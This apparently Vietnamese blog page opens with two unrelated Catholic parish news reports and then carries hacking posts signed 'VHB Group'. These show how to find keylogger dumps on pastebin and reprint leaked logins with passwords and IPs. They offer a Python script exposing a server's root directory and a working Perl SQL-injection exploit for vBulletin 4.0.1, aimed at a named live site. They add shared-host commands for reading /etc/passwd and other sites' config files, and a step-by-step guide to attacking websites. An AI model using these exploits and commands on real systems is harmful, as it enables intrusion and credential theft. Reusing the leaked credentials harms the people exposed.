Thủ thuật, hacking, tool, code, công cụ hiện đại

Thủ thuật, hacking, tool, code, công cụ

chia sẻ

THÁNH LỄ BẾ GIẢNG NĂM HỌC 2014 -2015 TRUNG TÂM MỤC VỤ TỔNG GIÁO PHẬN SÀI GÒN

 "Hãy cộng tác với Thiên Chúa, loan báo Tin Mừng, thay vì khước từ". Trích lời giảng Linh Mục Phê rô Nguyễn Văn Hiền trong Thánh lễ bế giảng năm học 2014 -2015 trung tâm Mục Vụ, vào luc 18g30 ngày 29 tháng 5, tại nhà nguyện cổ Trung Tâm Mục Vụ

Cha Phê rô Nguyễn Văn Hiền- giám đốc học viện đã chủ tế Thánh lễ này. Đồng tế với cha có 6 cha đang phục vụ tại trung tâm Mục Vụ. Cùng tham dự Thánh lễ có các giảng viên và rất đông học viên của trung tâm Mục Vụ giáo phận đã ngồi kín nguyện nhà nguyện cổ của trung tâm Mục Vụ.

 Thánh lễ được bắt đầu với bài thánh ca gần gũi "Trong hân hoan chúng con về đây ..." như lời tạ ơn chung của cả trung tâm Mục Vụ dâng lên Thiên Chúa trong suốt một niên học qua. Thánh lễ được cử hành trong tâm tình tạ ơn và kèm theo lời mời gọi với câu Lời Chúa "Anh em hãy đi khắp tứ phương thiên hạ, loan báo Tin Mừng cho muôn loài thụ tạo"Mc 16,5 đã được dùng làm câu chủ đề của Thánh Lễ bế giảng nhằm mời gọi các học viên của trung tâm Mục Vụ cùng suy gẫm.

Trong bài giảng về đoạn Tin Mừng Mc 11,11-26, cha giám đốc đã chia sẻ về sứ vụ rao giảng Tin Mừng của người môn đệ của Chúa. "Hãy cộng tác với Thiên Chúa, loan báo Tin Mừng, thay vì khước từ".

Khi gợi lại hình ảnh Chúa Giê su đánh đuổi những kẻ buôn bán trong đền thờ Giêrusalem và cây vả bị chết khô vì bị nguyền rủa. Cha chia sẻ đến khía cạnh con người lãnh đạo Do Thái đã khép kín tâm hồn, không nhìn đến sứ vụ của mình, họ đã khước từ. Lời mời gọi cộng tác vào sứ mệnh không chỉ cho các môn đệ khi xưa, mà còn cho cả mọi tín hữu, đặc biệt các học viên của trung tâm Mục Vụ.

Cha chia sẻ về những vật cản, thách thức khiến con người còn ngần ngại cộng tác rao giảng Tin Mừng. Con người nay cũng cần được đánh thức tâm hồn, hãy ra khỏi mình, bao lâu còn hoang mang và khép kín tâm hồn trong những suy tư để thi hành sứ mệnh thì không thể ra đi loan báo Tin Mừng. "Trừ khi nào chúng ta trả lời có, sẵn sàng; chúng ta mới có thể sẵn sàng lên đường loan báo Tin Mừng".

Trước khi ban phép lành, cha giám đốc đã có hình ảnh rất cảm động. Khi cha đã học theo Đức Thánh Cha Phanxico đi bước trước - cám ơn trước. Cha đã gửi lời cám ơn các cha trong ban giám đốc trung tâm, cùng quý thầy cô. Cha đã dùng hình ảnh rất gần gũi. Trung tâm hiện có 10 cha, nếu mỗi cha làm cha sở của một họ đạo khoảng 5000 giáo dân thì chắc hẳn số giáo dân sẽ rất nhiều. Nhưng các cha đã được sai để phục vụ chỉ cho các học viên của học viện. Đây cũng là sự ưu ái của giáo phận, cũng như ơn ban của Chúa. Cha mong muốn các anh chị học viện sau này cũng cộng tác cùng các cha trong công việc đào tạo sau này cho giáo phận.






Sau đó, các anh chị trong ban chấp hành học viện đã có lời cám ơn quý cha giám đốc cùng quý thầy cô của trung tâm Mục Vụ. Tiếp lời cha giám đốc, cha Phanxico xavie Bảo Lộc đã giới thiệu 2 bông hoa nhân tạo dễ thương của học viện trong năm học vừa qua: Bông hoa tinh thần- các cha giáo trong trung tâm đã sắp xếp cử hành thánh lễ mỗi ngày tại trung tâm mục vụ lúc 18g mỗi ngày để đáp ứng nhu cầu mục vỵ. Bông hoa thứ hai là đã có 2 lớp học ngoại ngữ: Anh ngữ và Hoa ngữ. Cha cũng nhấn mạnh lớp Hoa ngữ, vì mong muốn sẽ có nhiều học viên sẽ học và cộng tác trong nghiên cứu các tập văn truyền giáo cổ xưa bằng tiếng Hán Môm, có ý nghĩa quan trọng. Sau đó, các học viên lớp Anh ngữ và Hoa ngữ đã thể hiện 2 bài hát vào cuối Thánh lễ. Với lời bài hát là lời mời gọi hãy loan báo Tin Mừng "Hey, You, stand up for God" được lớp Anh ngữ thể hiện và bài  "Ánh trăng nói hộ lòng tôi" nhạc Hoa lời Việt.


Sau buổi lễ, các thành viên của trung tâm mục vụ đã có buổi liên hoan nhẹ, và chụp hình lưu niệm sau một năm học.


KÝ SỰ: Chuyến Đi Bác Ái Ra Khơi lần thứ XIX- GIỚI TRẺ HÀNG XANH

"Lên đường đem Chúa đến với mọi người, như những tông đồ đã được Chúa Thánh Thần thúc đẩy". Đó là lời chía sẻ trong thánh lễ Chúa Nhật Chúa Thánh Thần hiện xuống, tại giáo xứ Trà Ếch- nơi đã diễn ra chương trình bác ái Ra Khơi, lần thứ XIX, trong 2 ngày 23 và 24 tháng 5, 2015 của nhóm giới trẻ giáo xứ Hàng Xanh, tổng giáo phận Sài Gòn.

Như đã là một trong những sinh hoạt lớn nhất của nhóm giới trẻ Hàng Xanh, chương trình Ra Khơi XIX được thực hiện tại giáo xứ Trà Ếch, thuộc giáo phận Cần Thơ, tỉnh Sóc Trăng. Chương trình với sự tham gia chính gồm 35 bạn trẻ sinh hoạt tại giáo xứ Hàng Xanh, cùng các cô chú ân nhân của nhóm. Chương trình bác ái với tâm niệm đem niềm vui đến với thiếu nhi tại những giáo xứ vùng xâu, vùng xa; cũng như ước muốn đem Chúa đến với những anh chị em khó khăn.

I. Lên đường

Giáo xứ Trà Ếch, địa điểm mà nhóm giới trẻ Hàng Xanh đến lần này cách xa thành phố hơn 400 km. Vì thế, từ rạng sáng các thành viên đã tập trung tại sân nhà thờ giáo xứ Hàng Xanh để lên đường. Công tác chuẩn bị đã được các bạn trẻ trong ban mục vụ giới trẻ giáo xứ chuẩn bị tấp nập hơn cả tháng nay. Đặc biệt, những ngày gần ngày ra quân, các bạn trẻ đã bỏ rất nhiều công sức để chuẩn bị chương trình: từ những phần quà, các trò chơi hội chợ. Những vật dụng dành cho chuyến đi lần này, nhiều đến nỗi, bác tài xế đã phải thốt lên: "Lần đầu tiên, tôi đưa một đoàn đi với lượng đồ nhiều kinh khủng thế này !"

Đúng 3h 30 phút sáng, cha phụ tá Phê rô Maria Giuse Hà Thiên Trúc đã ban phép lành cho các thành viên của đoàn, cùng gửi lời chúc tốt lành của cha chánh xứ Giuse Maria Phạm Hồng Thái, với ý chúc đoàn có chuyến đi bình an và đem Chúa đến nhiều người.

Sau khi đã chào cha, các thành viên đã cùng nhau chung tay xếp đồ lên xe. Những đồ đã được nhóm chuẩn bị cho thiếu nhi cùng các hộ gia đình tại giáo xứ Trà Ếch. Đúng 4h 30 phút, xe lăn bánh hướng về giáo phận Cần Thơ.


II. Đến nơi

9h sáng, Chuyến xe của đoàn Ra Khơi Bác Ái XIX đã đến địa điểm của giáo xứ Trà Ếch. Tuy nhiên, xe lớn không thể vào giáo xứ, các thành viên lại thêm một lần nữa đem những món quà mình từ xe vào giáo xứ với đoạn đường hơn 200 m. Tuy nặng và nhiều nhưng những món quà mang đậm tinh thần bác ái hy sinh của các thành viên đoàn.
Khi vận chuyển đồ của đoàn, nhưng vẫn rất may, tôi nghe được câu nói nhỏ của một em thiếu nhi: "Ôi ! các cô chú, anh chị đem sao nhiều quà thế !"

Sau khi đã ổn định, cả đoàn của nhóm giới trẻ tập trung chào cha sở Phanxico Nguyễn Văn Tiếp chánh xứ giáo xứ Trà Ếch. Cha hồ hởi vì đoàn tuy 40 người thôi, nhưng đã đem đến rất nhiều niềm vui ngay khi đặt chân đến giáo xứ. Không thể để mất thời gian, các bạn trẻ cùng các cô chú đã bắt tay ngay vào công tác chuẩn bị cho chương trình lớn vào ngày hôm sau.
Các thành viên đã mau chóng vào nhiệm vụ của mình để chuẩn bị tốt nhất cho chương trình. Trà Ếch là một giáo xứ nhỏ, với chỉ hơn 40 hộ công giáo, hơn 50 thiếu nhi Thánh Thế. Nhưng với hơn 500 thiếu nhi nghèo ngoài công giáo. Với số lượng trên, các thành viên đã phải bắt tay ngay vào công tác khác nhau: Nhóm phân quà, nhóm chuẩn bị hội chợ, nhóm ẩm thực cho hội chợ, nhóm ẩm thực cho đoàn trong 2 ngày Ra Khơi. Tuy vất vả, nhưng mọi người, ai cũng mang trên môi nụ cười.

III. Đi thăm- Đem Chúa, đem niềm vui đến với mọi người

15 h 30 phút, các thành viên trong đoàn bắt đầu hoạt động chính đầu tiên trong chương trình Ra Khơi- đến thăm và đem những phần quà đến các hộ gia đình tại giáo xứ Trà Ếch. Các phần quà, của đoànđược chia cho các nhóm để lên đường thực hiện. Tuy nhỏ nhưng mang nhiều tinh thần sẻ chia, khi các thành viên đến trực tiếp hỏi thăm các hộ gia đình.


Những nơi, nhóm giới trẻ đến đa phần là những hộ gia đình nghèo, tuy không là gia đình công giáo. Như thế, càng đậm ý nghĩa đem tình thương và tinh thần truyền giáo đến cho mọi người. Ngồi hỏi thăm một cụ lớn tuổi, khi nhóm của tôi ghé thăm, cụ nói: "Các con ghé thăm mà còn tặng quà thật là vui sướng quá. Trước giờ, bà ở một mình buồn lắm !" Câu chuyện sẻ chia giữa nhóm tôi và cụ còn nhiều lắm và vui lắm. Và chắc chắn, các nhóm khác cũng có những mẩu chuyện sẻ chia khó quên khác.

17 h 30 phút, các thành viên đã trao xong các phần quà cho các hộ gia đình. Các thành viên nghỉ ngơi và dùng cơm tối. Chuẩn bị tham dự thánh lễ Chúa Thánh Thần Hiện Xuống.

IV. Thánh Lễ Chúa Nhật Chúa Thánh Thần Hiện Xuống

Khoảng 19 giờ 30 phút, các thành viên đoàn tham dự thánh lễ dành riêng cho đoàn. Cha sở giáo xứ đã ưu ái dành riêng cho giới trẻ Hàng Xanh một thánh lễ riêng. Một điểm đặc biệt riêng, các thành viên đã hát lễ với đàn guitar, những bài thánh ca được đoàn hát và dâng lễ rất sốt sắng.

Trong bài giảng lễ, Cha sở đã nhắn nhủ các thành viên: "Hãy lên đường đem Chúa đến với mọi người, như những tông đồ đã được Chúa Thánh Thần thúc đẩy". Thánh Lễ kết thúc bằng bài thánh ca được các thành viên hát rất tâm tình: "Thần Khí Chúa đã sai tôi đi, sai tôi đi loan báo Tin Mừng ..."

V. Lửa Tâm Tình

Sau khi tham dự thánh lễ, các thành viên nhóm giới trẻ đã quy tụ với nhau tham gia một sinh hoạt đặc trưng của nhóm- Lửa Tâm Tình. Các thành viên, cùng nhau chia sẻ tâm tình của mình về cảm xúc khi tham gia giới trẻ, khi tham gia chương trình Ra Khơi, cùng những đóng góp cho giới trẻ ngày càng lớn mạng thêm. Những lời chia sẻ được từng thành viên sẻ chia dưới đóm lửa của chương trình, như ngọn lửa Chúa Thánh Thần đốt nóng từng thành viên.


Bạn Hải, thành viện lần đầu được tham gia chương trình bác ái đã chia sẻ: "Rất vui khi được tham gia chương trình Bác Ái Ra Khơi cùng giới trẻ Hàng Xanh và sẵn sàng tham gia chương trình tiếp theo". Buổi tâm tình của nhóm kết thúc sau những lời sẻ chia đầy súc động của từng thành viên. Sau đó, các thành viên bước vào thời gian nghỉ ngơi, lấy sức cho chương trình chính ngày hôm sau.

VI. Hội chợ Ra Khơi XIX

Từ 4 giờ sáng, các bạn trong ban ẩm thực cho hội chợ đã phải dậy sớm hơn để chuẩn bị cho gian hàng ẩm thực. Bạn Maria Trần Thị Tuyết Mai, cùng các bạn khác trong ban ẩm thực đã chuẩn bị hơn 400 phần ăn cho gian hàng ẩm thực với những món ăn: Bắp xào, cá viên chiên, mì xào.

Khoảng 5 giờ sáng, các thành viên của đoàn tập trung tập thể dục, chuẩn bị sức khỏe cho hoạt động lớn nhất của ngày Ra Khơi. Sau đó, các bạn đã nhanh chóng ăn sáng và bắt tay ngay vào chuẩn bị các gian hàng.

Cách nhanh chóng, các gian hàng trò chơi: Vượt Biển Đỏ, Ghi Bàn cùng Giê su, Bảy Ơn Chúa Thánh Thần, ... hay những gian hàng đặc biệt: gian hàng cắt tóc, gian hàng đồ tự chọn, gian hàng quần áo, gian hàng ẩm thực, gian hàng chụp ảnh. Khác hẳn so với những đợt Ra Khơi trước, giới trẻ Hàng Xanh đã tạo thêm gian hàng chụp hình nhằm đem lại nụ cười và ghi lại nhiều kỷ niệm cho thiếu nhi miền quê. Và cũng thế, cũng đem lại nhiều công tác hơn cho những thành viên đoàn. Tuy nhiên, trên môi các thành viên luôn là nụ cười miền vui phục vụ.









Đúng 8 giờ sáng, chương trình hội chợ bắt đầu. Rất nhiều thiếu nhi xung quanh giáo xứ đã đến để tham gia hội chợ. Dường như, tất cả các gian hàng đã bị quá tải vì số lượng thiếu nhi, cùng các phụ huynh đến các gian hàng.

Một cô khi được tham gia gian hàng quần áo tự chọn đã nói suy nghĩ của mình như sau: "Lần đầu tiên, cô được lựa quần áo nhiều và được đem nhiều về nhà thế này !" Những nụ cười luôn nở trên môi các em thiếu nhi khi được tham gia các trò chơi hay được chụp hình ghi lại kỷ niệm. Gian hàng cắt tóc mới được đưa vào chương trình lần này cũng đón nhận nhiều kỷ niệm với những hình ảnh khó quên.

Chương trình kéo dài như tình thần hy sinh bác ái muốn kéo dài. Khi đến giữa trưa, chương trình hội chợ mới kết thúc. Tuy các thành viên đã mệt nhoài nhưng trên môi luôn là nụ cười vì đã đem được niềm vui đến cho thiếu nhi vùng Trà Ếch. Sau đó, các thành viên cùng nhau dùng bữa cơm trưa tại khuân viên nhà thờ để lấy lại sức.

VII Kết thúc - Lên đường trở về

Sau giờ nghỉ trưa, 15 giờ, các thành viên tập chung chào cha sở giáo xứ Trà Ếch để lên đường quay về Hàng Xanh.Chương trình dài nhưng cũng phải đến thời điểm kết thúc, cha sở nói lời cám ơn đến đoàn giới trẻ Hàng Xanh và mong ước có ngày được gặp lại. Sau đó, cả đoàn tập trung chụp hình lưu niệm với cha chánh xứ.


Trên đường về Hàng Xanh, bạn Anna Trần Thị Nương trưởng giới trẻ Hàng Xanh cùng bạn Maria Nguyễn Thị Hồng Vân đã thay lời cả đoàn cám ơn cô chú ân nhân đã đồng hành cùng giới trẻ giáo xứ trong chuyến Ra Khơi. Cả đoàn đã quay về lại giáo xứ Hàng Xanh vào lúc 20 giờ. Trong tâm tư, ai cũng còn lưu mãi những hình ảnh của chuyến đi.


Attack windows 7 32 bit with backdoor




Tìm password từ các con keylog trên thế giới

Vào trang http://pastebin.com/
tìm khung search bar và nhập vào

Program:firefox Url/Host:http://www.facebook.com login

hoặc

Program:firefox Url/Host:http://www.yahoo.com login

tùy cái cần tìm mà nhập nhá

vì dụ với Program:firefox Url/Host:http://www.facebook.com login
ta nhận đc là







Chọn vào 1 link ta check thử đc


 Program:        Firefox
Url/Host:       http://www.facebook.com
Login:          eleazarberrios@hotamail.com
Password:       eleazarberrios
Computer:       PC-3F2D90D21838
Date:           2010-12-30 23:51:12
Ip:                     200.82.253.174
----------------------------------------------------------
Program:        Firefox
Url/Host:       http://hacking-facebook.com
Login:          ele1234
Password:       eleazarberriosw
Computer:       PC-3F2D90D21838
Date:           2010-12-30 23:51:17
Ip:                     200.82.253.174
----------------------------------------------------------
Program:        Firefox
Url/Host:       http://www.facebook.com
Login:          eleazarberrios@hotmail.com
Password:       eleazarberrios
Computer:       PC-3F2D90D21838
Date:           2010-12-30 23:51:18
Ip:                     200.82.253.174
----------------------------------------------------------
Program:        Firefox
Url/Host:       https://login.facebook.com
Login:          eleazarberrios@hotmail.com
Password:       eleazarberrios
Computer:       PC-3F2D90D21838
Date:           2010-12-30 23:51:19
Ip:                     200.82.253.174
----------------------------------------------------------
Program:        Firefox
Url/Host:       http://es-es.facebook.com
Login:          elitag12@hotmail.com
Password:       misbebes
Computer:       LENOVO
Date:           2010-12-31 00:06:19
Ip:                     190.22.122.185
----------------------------------------------------------
Program:        Firefox
Url/Host:       http://es-es.facebook.com
Login:          carlitag12kids@hotmail.com
Password:       carlitalaxora39
Computer:       LENOVO
Date:           2010-12-31 00:06:19
Ip:                     190.22.122.185
----------------------------------------------------------


tất nhiên pass có thể đã bị đổi,hên xui thôi =))
ta tháy có thể tìm hàng ngàn account đã bị keylog bắt :)) 

Capuchino - VHB Group

Sym root bypass open port nếu server cho chạy python

Đầu tiên mọi người có thể kiểm tra xem có gói python đc cài trên server chưa
dùng lệnh python -h xem có trả về kết quả gì ko nè.
Nếu có chạy thì tạo đoạn code python sau lưu vào file capuchino.py

#!/usr/bin/env python
# Bypass for (c) 2013
import SimpleHTTPServer
import SocketServer
import os
port = 7777
if __name__=='__main__':
os.chdir('/')
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", port), Handler)
print("Now open this server on webbrowser at port : " + str(port))
print("example: http://maho.com:" + str(port))
httpd.serve_forever()

Sau đó chạy nó python capuchino.py

rồi kiểm tra kết quả :victim:7777

Cách này có thể giấu đc kết quả thực hiện sym trên server

Capuchino - VHB Group

Video Tổng hợp về botnet

Đây là những video mình sưu tầm từ nhiều nguồn!!

http://www.mediafire.com/download.php?qqtc0ad59vqrrji
http://www.mediafire.com/download.php?l6imrwffsnwq75r


changyun - VHB Group

Exploit vbb 4.0.x bằng perl cho newbie

hạy perl xong
Tạo file perl với nội dung

 #!/usr/bin/perl
use IO::Socket;

print q{
#######################################################################
#    vBulletin? Version 4.0.1 Remote SQL Injection Exploit                                      #
#                    By th3.g4m3_0v3r                                                                          #
#              our Site www.h4ck3r.in                                                                         #
#           www.hackingcrackingtricks.blogspot.com                                                  #
#           Indian (th3.g4m3_0v3r@yahoo.com)                                                          #
#          Dork: Powered by vBulletin? Version 4.0.1                                                  #          

#######################################################################
};
if (!$ARGV[2]) {
print q{
    Usage: perl  VB4.0.1.pl host /directory/ victim_userid

       perl  VB4.0.1.pl www.vb.com /forum/ 1

};
}


$server = $ARGV[0];
$dir    = $ARGV[1];
$user   = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid   = $ARGV[5];
print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>]    DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";

$server =~ s/(http:\/\/)//eg;

$path  = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ? ?,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ;

print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";
print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";


print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{

  if ($1 ne 0) {
   print "Password is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";

      }
exit();
}
}
print "------------------------------------------------------------------------------------------------\r\n";

Lưu ví dụ như capuchino.pl hihi

Tìm 1 site vbb 4.0.x
Mình ví dụ ở đây là http://www.flashyworld.com/vb/index.php

mở cmd lên,vào thư mục lưu file capuchino.pl
chạy capuchino.pl flashyworld.com /vb/ 1
cấu trúc ở đây là file.pl site.com /folderforum/ userid
userid admin thì thường là 1
sau khi chạy thì ta thấy






Pass nhận đc là : e714ad492ee5e2d84bca13c17fd6464a vào bằng cookie thôi

dork tìm victim :"Powered by vBulletin® Version 4.0.1"
bonus thêm 1 victim còn khai thác đc
 





Capuchino - VHB Group

Check sqlinjection vbulletin mod chang stats

Check sqlinjection vbulletin mod chang stats

http://www.mediafire.com/download/rsbbczaf00abqtf/sql+vhb+chang+stats.rar


Capuchino - VHB Group

Tổng hợp những lệnh shell hay dùng khi local

1) Xem list domain & user trên cùng sever

directadmin: cat /etc/virtual/domainowners
cpanel: ls -la /etc/valiases/tendomainvictim.com

cd/etc/vdomainaliases;ls-lia

Trường hợp đặc biệt khi không thể xem user nằm cùng host thì ta thêm && vào

cd/etc/vdomainaliases && ls-lia

2)Xem tên user: tùy vào distro linux khác nhau sẽ có các câu lệnh đọc file khác nhau.

cat /etc/passwd
less /etc/passwd
more /etc/passwd
head /etc/passwd
tac /etc/passwd
rev /etc/passwd
xxd /etc/passwd

3)Local sang victim bằng lệnh dir ( 2013 - giờ hiếm server nào còn sài được)

dir /home/ten user can local/public_html

vd: dir /home/vhb/public_html

4)Xem nội dung file lệnh xem file cũng tương tự như mục số 2
-> có thể sài các lệnh đó thay thế cho cat, less,...

cat/home/ten user can local/public_html/index.php

vd: cat /home/vhb/public_html/@vhb@/includes/config.php
vd: less /home/vhb/public_html/@vhb@/includes/config.php

5) Symlink: tác dụng gần giống như tạo shorcut trên windows.

ln -s/home/ten user can local/public_html/index.php index.txt

vd: ln -s /home/vhb/public_html/@vhb@/includes/config.php 1.txt
vd: ln -s /home/vhb/public_html/@vhb@/includes/config.php 1.ini
với file 1.txt hay 1.ini là mình tự đặt để nó tạo liên kết từ file config.php đến.

6) Tìm path của mấy victim sài Add on domain

find /usr/local/apache/logs/ -name 'error_log' | xargs grep -E 'victim.com'


----------------------------------------------

concobe - VHB Group

Tư duy - Phương hướng Attack Website - Server

Tình hình là có khá nhiều bạn pm mình hỏi cách check site.Mà Mình cũng không có nhiều thời gian để chỉ từng bạn.Nên mình viết cái đường đi.Tư duy check site để các bạn đọc.Từ đó có một cái định hướng.Tự mình nghiên cứu.Thực hiện.

Điều đầu tiên mình muốn nói đó là muốn tấn công 1 site.Điều đầu tiên bạn cần có đấy là sự kiên nhẫn.Cóp nhặt từng tí một.Không thể nôn nóng mà bỏ qua nhiều thông tin.Dẫn đến giảm hiệu quả.Không phải website nào tấn công 1 phát cũng là được ngay.Chính vì thế nên phải tích từng đi thông tin một.

Nếu để kiếm một site để check chơi thì tốt nhất là các bạn nên dùng các dork tìm các site có lỗi sẵn.Ví dụ như các dork sqli .Các dork của các phiên bản joomla ,vbulletin có lỗi.Như vậy sẽ hiệu quả hơn là tìm 1 site bất kì rồi xem thử nó có lỗi không. (Ngoài ra còn có một cách nhanh hơn nữa đó là dùng tool scan dork.Nó sẽ tìm cho bạn một khối site bị lỗi có thể check được từ một list dork có sẵn.Cái này hiệu quả hơn cho dân UG lúc tìm shop lỗi.)

Còn nếu bạn muốn tấn công một website xác định.Thì việc này khó hơn.Giả sử victim của bạn có domain là target.com .Để tấn công victim một cách hiệu quả.(Mình nói ở đây là cả đối với host share và private.Site lớn có bảo mật tốt,lẫn site nhỏ,forum. ) .

Bước 1: Lấy thông tin ban đầu.

Lấy thông tin của victim .Bằng các whois nó.Tìm hiểu càng nhiều thông tin về victim càng tốt.Và google ,bing ,yandex .... đều là các công cụ hữu ích.Mình khuyên nên thử với nhiều công cụ tìm kiếm.Vì bản thân thuật toán tìm kiếm của các công cụ này khác nhau nên dẫn đến cho nhiều kết quả với hiệu quả khác nhau.
Ví dụ như nhập vào công cụ search như sau

ip:123.101.11.122 id=

Nó sẽ cho ta một số thông tin thú vị.Bạn hãy cố gắng thu thập thông tin ban đầu càng nhiều càng tốt.Chủ sở hữu domain.Admin của website.Support.Kể cả số điện thoại , facebook,gmail ,yahoo, địa chỉ mail của công ty.1 Attacker giỏi là một attacker có khả năng tận dụng mọi sơ hở.Mọi điểm yếu có thể tấn công.

Bước 2 : Phân tích khả năng tấn công.

Đầu tiên là nên scan victim chính.Scan victim chính là công việc chủ đạo.Đối với site nằm trong server private của các công ty lớn.Thì đây là bước đóng vai trò quyết định bạn có thể attack được nó hay không.
Công cụ scan khá nhiều.Mình giới thiệu bạn 1 số bộ như acunetix Vulnerablility Scanner . OpenVas (của backtrack ) , w3af ( của backtrack ) , nessus (của backtrack ), wpscan ( scan wordpress trong backtrack ) , joomlascan ( scan bug joomla trong backtrack , uniscan ( trong backtrack ) ... ngồi mà kể hết các bộ công cụ chắc đến sáng mai.Công cụ thì nhiều nhưng các bạn nên chọn lựa.Đối với victim nào nên dùng bộ nào.Và nên dùng kết hợp.Vì như mình đã nói.Với mỗi tool khác nhau nó dùng cơ chế ,thuật toán scan khác nhau.Nên hiệu quả nó cũng khác nhau.Từ kết quả scan được.Nó cho ta định hình phải tấn công như thế nào.

Scan server.Scan lấy thông tin về server.Ví dụ như xem server dùng hệ điều hành gì.Sử dụng Apache ,SII phiên bản bao nhiêu. Được viết trên ASP hay PHP .Port nào mở.(Để scan port thì có thể dùng nmap.Nó là công cụ rất hiệu quả).

Mọi thông tin về phiên bản,port bạn hãy google ngay.Hoặc vào exploit-db.com xem nó có thể bị attack thông qua nó hay không.Còn không bạn có thể lưu lại thông tin.Rồi sau đó kiểm tra 1 lần xem sao.Đây là các bước rất cần thiết đối với việc tấn công 1 website lớn.

Đối với Server share host.Phân tích khả năng tấn công .Đây cũng là một bước rất quan trọng.Nó rút ngắn thời gian tấn công của bạn.Nhưng mang lại hiệu quả cao.
Mình thấy đa số (Và trước đây mình cũng vậy ). Đó là để tấn công 1 website ko bị lỗi ,Không có lỗ hổng.Mình thường reserve ip của server chứa victim.Rồi mở từng site check xem có sqli hay không.
Đồng ý là sqli rất nhiều.Và rất dễ khai thác.Nhưng không phải lúc nào mình cũng có thể may mắn.Check 1 cái là ra link bị lỗi ngay.Nếu scan toàn bộ site thì đến bao giờ mới xong.Có một cách rút ngắn quá trình này đó là xác định loại site cần tấn công.

Mình ví dụ.Bạn có kinh nghiệm về check wordpress.Bạn muốn tìm các site trong server sử dùng mã nguồn này để tấn công.Sau đó local sang victim chính.Hãy dùng google với dork là

ip:112.78.2.247 "wordpress"

Như đây mình nhận được một victim trong server này sử dụng wordpresss http://www.saigoncanho.com.vn/

Tương tự cho các mã nguồn khác cũng vậy.

Bước 3: Tấn công.

Đây là bước nhiều nhất,Nhưng mình nói ít nhất,ví nó có quá nhiều kiểu tấn công.Biết nói thế nào cho hết được.
Chỉ đúc kết một số kinh nghiệm.Ví dụ như đối với forum vbb chẳng hạn.Nhiều phiên bản thực sự không có bug.Nhưng không phải vì thế mà ta bỏ qua.Hãy xem các web application của nó.Ví dụ như các mod.Đối với joomla và các mã nguồn khác cũng vậy.Hãy xem cách extension đi theo.Chúng rất hay bị lỗi.Bởi vì đây đa số là các ứng dụng tích hợp được viết bởi các web developer việt nam.Chúng rất kém trong việc bảo mật.

Tận dụng tối đa kết quả mà các bạn scan ở trên.Ví dụ như bạn scan được server dùng apache 2.1 chẳng hạn.Hãy xem nó là bản update chưa.Nếu chưa có lỗi để khai thác không.Tấn công vào nó.Xem thông tin từ các lỗi public trên google mà tấn công.Hãy cố gắng tấn công 1 cách từ từ.

Xem trong cấu trúc site khi scan được .Chỗ nào là khai thác được.Ví dụ như chúng để lại database back up trên site chẳng hạn.Tải về và phân tích ngay.

Nhiều bộ công cụ scan nó scan đến từng lỗi nhỏ.Như tìm vị trí có thể up ảnh, up file bẳng hạn.Hãy cố bypass up shell thử xem.

Ở mục này có quá nhiều cái để nói.Và thực chất đa số mọi tut hack thường nói về phần này.Nên mình để phần này cho các bạn.Hãy cố gắng tích hợp càng nhiều kinh nghiệm phần này .Càng nhiều càng tốt.Các phần khác nó đi theo 1 qui luật nhất định.Có thể đối với victim nào bạn cũng làm như thế.Nhưng đối với phần này.Nó phụ thuộc vào nhiều thứ.Phụ thuộc vào kết quả scan được.Phụ thuộc vào những đối tượng khác nhau.Nên nó rất đa dạng.

Kết quả ở phần này.Là bạn có thể có được tài khoản admin.Up được shell.

Bước 4: Nếu tấn công được trực tiếp target rồi thì không nói làm gì.Nếu tấn công đc một site nằm cùng server.Thì bước tiếp theo là local.Về vấn đề local này cũng khá rộng.Mình chỉ nói qua một phần trong đó.

Trong local thì symlink là một kiểu local phổ biến nhất ,Được dùng nhiều nhất.Nó như là một shortcut bên window.Góp phần làm nhanh quá trình gọi chạy một file.Nếu như gọi trực tiếp hardlink thì quá trình họat động của server sẽ chậm hẳng.

Trong phương pháp local.Mục đích chính của chúng ta là đọc / lấy các file config (hoặc 1 file config của target cần tấn công ). Việc thực hiện đầu tiên là chúng ta thường đọc file /etc/passwd để xác định tất cả các user nằm trong server ( Và không phải server nào cũng cho ta thực hiện đc.Phải bypass ).

Để đọc file config ta còn phải nắm các mã nguồn.Với mỗi mã nguồn khác nhau thì file config nó nằm ở một vị trí khác nhau.
Mình đưa ra một số file config đối với một số mã nguồn tương ứng.

vBulletin : /includes/config.php
IPB : /conf_global.php
MyBB: /inc/config.php
Phpbb: /config.php
Php Nuke : /config.php
Php-Fusion : config.php
SMF : /Settings.php
Joomla : configuration.php
WordPress : /wp-config.php
Drupal: /sites/default/settings.php
Oscommerce: /includes/configure.php

Từ đây ta hình dung được đường dẫn chính xác dẫn đến file config của victim.Từ đó có thể symlink được chính xác file cần đọc. (Nếu như victim đổi vị trí của file config.Thì ta phải ngồi symlink mò.Symlink từ index nó,đến những file khác,xem nó include những file nào .Từ file này dò đến file kia.Đối với một attacker kinh nghiệm.Thì việc bảo mật bằng cách giấu file config của victim đôi khi không hiệu quả.

Cấu trúc lệnh symlink (để symlink file có địa chỉ là /home/usertarget/public_html/includes/config.php target.txt
lệnh này symlink file config về file target.txt nằm ở thư mục ta đang symlink. Ở điều kiện tốt nhất ta có thể đọc đc file target.txt này trên host ta đặt shell.

